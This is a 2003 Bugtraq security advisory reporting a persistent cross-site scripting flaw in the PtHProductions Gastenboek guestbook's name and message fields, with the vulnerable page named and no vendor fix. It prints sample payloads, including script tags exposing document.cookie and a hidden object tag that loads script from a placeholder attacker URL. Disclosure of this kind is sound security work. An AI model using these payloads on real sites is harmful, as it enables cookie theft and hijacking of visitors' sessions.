[31374] in bugtraq
PtHProductions Gastenboek - XSS
daemon@ATHENA.MIT.EDU (morning_wood)
Tue Sep 2 14:24:46 2003
From: "morning_wood" <se_cur_ity@hotmail.com>
To: <bugtraq@securityfocus.com>, <full-disclosure@lists.netsys.com>,
<helpdesk@pthproductions.be>
Date: Mon, 1 Sep 2003 09:57:43 -0700
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: <LAW11-OE33CumSA0W5100003d68@hotmail.com>
------------------------------------------------------------------
- EXPL-A-2003-022 exploitlabs.com Advisory 022
------------------------------------------------------------------
-= PtHProductions Gastenboek =-
Donnie Werner
Aug, 29 2003
Vunerability(s):
----------------
1. Persistant XSS injection
Product:
--------
PtHProductions Gastenboek
Description of product:
-----------------------
Guestbook for / by www.pthproductions.be
VUNERABILITY / EXPLOIT
======================
message and name fields allows XSS injection
view - Bekijk gastenboek
post - Teken gastenboek
http://www.pthproductions.be/jongeren/Gastenboek/sign.asp
input XSS of your choice
<SCRIPT>alert(document.domain);</SCRIPT>
<SCRIPT>alert(document.cookie);</SCRIPT>
or
<object style="display:none" data="http://verybad-exploit-url/bad.js"></object>
Local:
------
no
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor Contact:
---------------
helpdesk@pthproductions.be
Concurrent with this advisory
Credits:
--------
Donnie Werner
morning_wood@e2-labs.com
exploited? http://exploitlabs.com
